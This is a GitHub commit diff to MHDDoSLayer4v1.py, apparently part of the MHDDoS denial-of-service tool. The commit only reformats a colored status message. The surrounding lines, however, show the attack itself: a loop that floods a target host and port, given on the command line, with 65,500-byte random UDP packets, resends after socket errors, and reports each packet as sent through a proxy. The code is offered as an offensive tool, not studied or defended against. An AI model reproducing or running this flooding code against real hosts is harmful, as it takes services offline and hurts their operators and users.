Update MHDDoSLayer4v1.py

This commit is contained in:
MHProDev 2020-10-23 03:06:02 +03:30 committed by GitHub
parent 1f355578fb
commit ac4c02919e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -64,7 +64,7 @@ def main():
else:
port = int(sys.argv[2])
sock.sendto(random._urandom(65500),(str(sys.argv[1]),int(port)))
print(' \033[92m',randoms,"| \033[97m[\033[92m!\033[97m] \033[97mPacket Sended By\033[96m", str(proxy.rstrip("\n\r")))
print('\033[97m[\033[92m!\033[97m] \033[93m'+str(randoms),"| \033[97mPacket Sended By\033[96m", str(proxy.rstrip("\n\r")))
except socket.error:
sock.sendto(random._urandom(65500),(str(sys.argv[1]),int(port)))
except socket.timeout: